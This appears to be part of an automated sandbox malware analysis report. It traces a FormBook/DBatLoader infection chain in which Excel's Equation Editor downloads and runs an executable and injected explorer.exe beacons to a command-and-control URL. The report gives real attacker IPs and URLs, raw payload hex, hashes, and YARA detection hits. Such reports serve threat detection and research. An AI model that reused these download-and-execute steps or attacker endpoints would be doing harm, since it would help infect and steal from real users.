Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 13.250.31.113 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | kBytes transferred | Direction | Data
Dec 2, 2021 19:33:55.143656969 CET | 0 | OUT | GET /7009/binso.exe HTTP/1.1
                                                            Accept: */*
                                                            Accept-Encoding: gzip, deflate
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                            Host: 13.250.31.113
                                                            Connection: Keep-Alive
Dec 2, 2021 19:33:55.306956053 CET | 1 | IN | HTTP/1.1 200 OK
                                                            Date: Thu, 02 Dec 2021 18:33:47 GMT
                                                            Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.25
                                                            Last-Modified: Thu, 02 Dec 2021 09:01:28 GMT
                                                            ETag: "aa600-5d2260935ec6b"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 697856
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-msdownload
                                                            Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 9e 05 00 00 04 05 00 00 00 00 00 10 ac 05 00 00 10 00 00 00 b0 05 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 10 0b 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 0a 21 00 00 00 a0 06 00 00 66 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 06 00 6c 63 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 06 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 5c 9c 05 00 00 10 00 00 00 9e 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 80 14 00 00 00 b0 05 00 00 16 00 00 00 a2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 a5 0d 00 00 00 d0 05 00 00 00 00 00 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 0a 21 00 00 00 e0 05 00 00 22 00 
00 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 10 06 00 00 00 00 00 00 da 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 06 00 00 02 00 00 00 da 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 6c 63 00 00 00 30 06 00 00 64 00 00 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 66 04 00 00 a0 06 00 00 66 04 00 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 10 0b 00 00 00 00 00 00 a6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*@@!f0lc CODE\ `DATA@BSS.idata!"@.tls.rdata @P.reloclc0d@P.rsrcff@@P@P


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49181 | 87.98.234.164 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 2, 2021 19:35:29.554336071 CET | 1716 | OUT | GET /hno0/?mhcd=MR-LdRqXxT7p86&g6A06=gtNg4Bp0cFA4pVLeRD7vodntk6HewgsZ+AnpdRhteKnDm7bsVUj6fD8/RHuCSiZlcACYig== HTTP/1.1
                                                            Host: www.urzeczenie.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
Dec 2, 2021 19:35:29.582178116 CET | 1717 | IN | HTTP/1.1 404 Not Found
                                                            Date: Thu, 02 Dec 2021 18:35:28 GMT
                                                            Server: Apache/2
                                                            Content-Length: 392
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 6e 6f 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 75 72 7a 65 63 7a 65 6e 69 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hno0/ was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2 Server at www.urzeczenie.com Port 80</address></body></html>


                                                            Code Manipulations

                                                            Statistics

                                                            Behavior


                                                            System Behavior

                                                            General

Start time: 19:33:19
Start date: 02/12/2021
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase: 0x13fe20000
File size: 28253536 bytes
MD5 hash: D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                            General

Start time: 19:33:44
Start date: 02/12/2021
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase: 0x400000
File size: 543304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                            General

Start time: 19:33:48
Start date: 02/12/2021
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): true
Commandline: "C:\Users\Public\vbc.exe"
Imagebase: 0x400000
File size: 697856 bytes
MD5 hash: 3A9AE96D1F6404FCCF5BD99B7C5C0383
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Yara matches:
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.480010544.0000000000320000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497269548.00000000045D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497233291.00000000045D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.479622331.000000000031C000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.479715174.000000000030C000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497427116.0000000003A2C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497196939.00000000045D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497027305.00000000045D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.478861422.000000000030C000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.496929665.0000000003A2C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497250611.0000000003A2C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497289431.0000000003A2C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497089082.0000000003A2C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497109502.00000000045D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.478734155.0000000000334000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.478780322.000000000030C000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.478805681.000000000031C000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.479654433.0000000000334000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497453789.00000000045D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.480122394.000000000030C000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497486545.0000000003A2C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497066247.00000000045D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497151468.00000000045D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497352648.00000000045D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497402362.00000000045D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497007493.0000000003A2C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497047805.0000000003A2C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497310666.00000000045D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497216692.0000000003A2C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.496970511.0000000003A2C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497375359.0000000003A2C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.478831765.0000000000330000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497129768.0000000003A2C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497173543.0000000003A2C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.496988721.00000000045D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000002.559751606.000000000031C000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.496950369.00000000045D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497333632.0000000003A2C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.480088573.0000000000330000.00000004.00000001.sdmp, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 36%, ReversingLabs
                                                            Reputation:low

                                                            General

                                                            Start time:19:34:11
                                                            Start date:02/12/2021
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Explorer.EXE
                                                            Imagebase:0xffa10000
                                                            File size:3229696 bytes
                                                            MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:high

                                                            General

                                                            Start time:19:34:16
                                                            Start date:02/12/2021
                                                            Path:C:\Users\user\Odhbljup.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Odhbljup.exe"
                                                            Imagebase:0x400000
                                                            File size:697856 bytes
                                                            MD5 hash:3A9AE96D1F6404FCCF5BD99B7C5C0383
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:Borland Delphi
                                                            Yara matches:
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.560841692.00000000046D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.562335520.00000000046D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.561342324.00000000039EC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.560628845.00000000039EC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000003.541642413.0000000001D5C000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.560576590.00000000046D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.560966486.00000000039EC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.561221425.00000000046D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000003.540973597.0000000001D5C000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.562432544.00000000039EC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000003.541230145.0000000001D6C000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.561955738.00000000039EC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000003.541187560.0000000001D5C000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000003.541036876.0000000001D6C000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.560450286.00000000039EC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000003.541516401.0000000001D80000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.560538390.00000000039EC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.562142811.00000000046D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.562245816.00000000039EC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000003.541395274.0000000001D70000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.560383083.00000000046D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.561149693.00000000039EC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.561547476.00000000039EC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.560320590.00000000039EC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000003.541266508.0000000001D84000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.561741705.00000000039EC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.561654798.00000000046D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.560760985.00000000039EC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000003.541317929.0000000001D5C000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.560713668.00000000046D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.560263078.00000000046D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000003.540909993.0000000001D84000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.560188388.00000000039EC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
